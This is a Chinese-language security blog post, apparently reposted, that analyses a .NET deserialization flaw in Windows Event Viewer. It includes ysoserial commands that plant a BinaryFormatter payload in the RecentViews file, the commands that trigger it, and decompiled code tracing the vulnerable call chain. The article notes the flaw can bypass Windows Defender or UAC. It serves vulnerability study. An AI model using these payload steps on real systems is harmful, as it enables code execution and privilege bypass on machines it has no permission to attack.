干货 | 最新Windows事件查看器.NET反序列化漏洞分析

admin 2022年5月3日20:15:33安全闲碎评论15 views3398字阅读11分19秒阅读模式

0x01 漏洞背景

4月26日@Orange Tsai 在Twitter上发表一个有关Windows事件查看器的反序列化漏洞,可以用来绕过Windows Defender或者ByPass UAC等其它攻击场景,Orange视频里也给出了攻击载荷 DataSet 

ysoserial.exe -o raw -f BinaryFormatter -g DataSet -c calc > %LOCALAPPDATA%MicrosoftEventv~1RecentViews

干货 | 最新Windows事件查看器.NET反序列化漏洞分析

0x02 漏洞复现

@Orange Tsai 给出的ysoserial DataSet载荷因为笔者复现未成功,所以替换用TypeConfuseDelegate作为攻击载荷,%LOCALAPPDATA% 等同于 C:Users用户名AppDataLocal 目录,Eventv~1 代表目录名前6个字符 Eventv开头的第1个目录,其实可指定为本地的 Event Viewer文件夹,文件名一定得是固定的RecentViews,至于为什么可以看后续的原理分析,ysoserial 生成攻击载荷命令如下,有个小小的建议:可以先打开一次事件查看器,便于操作系统创建EventViewer目录,否则执行ysoserial命令会抛出 "系统找不到路径"错误

ysoserial.exe -o raw -f BinaryFormatter -g TypeConfuseDelegate -c calc > %LOCALAPPDATA%MicrosoftEventv~1RecentViews

打开Windows事件查看器或者输入如下所示的命令行均可触发漏洞

cmd/c eventvwr.msccmd/c eventvwr.exe

干货 | 最新Windows事件查看器.NET反序列化漏洞分析

0x03 调用链分析

打开事件查看器Windows系统会启动mmc.exe去关联eventvwr.msc,进中mmc.exe右击 ”属性“ -> .NET程序集 如下图所示

干货 | 最新Windows事件查看器.NET反序列化漏洞分析

反编译EventViewer.dll,笔者从EventViewer事件查看器核心代码入手,至于它继承的父类FormView及基类View不再跟进,EventViewerHomePage类是主入口,实现基类View里的虚方法OnInitialize,

干货 | 最新Windows事件查看器.NET反序列化漏洞分析

接着对EventHomeControl类做了初始化, UpdateUIDelegate(this.UpdateUI) 表示 EventHomeControl 读取数据并加载数据到可视化UI界面

public EventHomeControl(){    this.InitializeComponent();    UIControlProcessing.SetControlSystemFont(this);    UIControlProcessing.SetControlTitleFont(this.eventViewerLabel, this.Font);    this.updateUI = new EventHomeControl.UpdateUIDelegate(this.UpdateUI);    this.enableControl = new EventHomeControl.EnableControlDelegate(this.EnableControl);}

this.UpdateUI方法对可视化操作选项做了多重判断,有更新事件列表、有更新日志摘要、有更新事件列表当前对应的进程信息、还有我们重点关注的case 1 更新最近访问浏览的信息,进入UpdateRecentViewsUI 条件分支

干货 | 最新Windows事件查看器.NET反序列化漏洞分析

UpdateRecentViewsUI方法调用了UpdateRecentViewsListViewUI,并且将属性 RecentViewsDataArrayList的值传递给此方法,如下图

干货 | 最新Windows事件查看器.NET反序列化漏洞分析

RecentViewsDataArrayList属于EventsNode类的成员,数据来源自LoadDataForRecentView执行后的结果,这里是将EventsNode.recentViewsDataArrayList的值赋给了RecentViewsDataArrayList属性,代码如下

internal ArrayList RecentViewsDataArrayList{    get  {      this.LoadDataForRecentViews();      return EventsNode.recentViewsDataArrayList;  }}

LoadDataForRecentView方法再调用LoadMostRecentViewsDataFromFile,

干货 | 最新Windows事件查看器.NET反序列化漏洞分析

读取 EventsNode.recentViewsFile 流后用 Deserialize(fileStream) 去反序列化,再将集合赋给 recentViewsDataArrayList,这样正常情况RecentViewsDataArrayList就获取到了最近浏览的数据。代码如下

private void LoadMostRecentViewsDataFromFile(){   try  {  if (!string.IsNullOrEmpty(EventsNode.recentViewsFile) && File.Exists(EventsNode.recentViewsFile))    {    FileStream fileStream = new FileStream(EventsNode.recentViewsFile, FileMode.Open);    object syncRoot = EventsNode.recentViewsDataArrayList.SyncRoot;    lock (syncRoot)    {    EventsNode.recentViewsDataArrayList = (ArrayList)new BinaryFormatter().Deserialize(fileStream);    }    fileStream.Close();  }}catch (FileNotFoundException){}}

再来细看下EventsNode.recentViewsFile,整个定义在EventsNode类构造方法里分了3步,笔者个人觉得判断逻辑有些罗里吧嗦的 干货 | 最新Windows事件查看器.NET反序列化漏洞分析 

干货 | 最新Windows事件查看器.NET反序列化漏洞分析

第1步

Environment.SpecialFolder.CommonApplicationData 在Windows系统里表示 "C:Users用户名AppDataRoaming",StandardStringValues类自定义多个静态变量,如MicrosoftFolderName代表"Microsoft", LIN_EventViewer 代表 " Event Viewer ";

第2步

用 CommonApplicationData 替代 LocalApplicationData,LocalApplicationData代表 " C:Users用户名AppDataLocal ";

第3步

将前两步和“RecentViews”串起来,最终得到 recentViewsFile = ”C:Users用户名AppDataLocalMicrosoftEvent ViewerRecentViews“,所以笔者在上小节复现的时候提到RecentViews文件名是固定的不能改。

干货 | 最新Windows事件查看器.NET反序列化漏洞分析

如上图 ysoserial 生成攻击载荷写入到 MicrosoftEvent ViewerRecentViews,打开事件查看器即可触发漏洞。

0x04 结语

漏洞的主体调用链如下

-> View -> FormView -> EventViewerHomePage -> EventHomeControl -> UpdateUIDelegate(委托)-> UpdateUI -> UpdateRecentViewsUI -> UpdateRecentViewsListViewUI -> RecentViewsDataArrayList-> LoadDataForRecentView -> LoadMostRecentViewsDataFromFile -> BinaryFormatter().Deserialize

文章还可以在我的博客上在线阅读https://www.cnblogs.com/Ivan1ee,涉及的PDF和Demo已打包发布在星球,欢迎对.NET安全关注和关心的大伙加入我们

原文始发于微信公众号(赛博回忆录):干货 | 最新Windows事件查看器.NET反序列化漏洞分析

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年5月3日20:15:33
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  干货 | 最新Windows事件查看器.NET反序列化漏洞分析 http://cn-sec.com/archives/959787.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: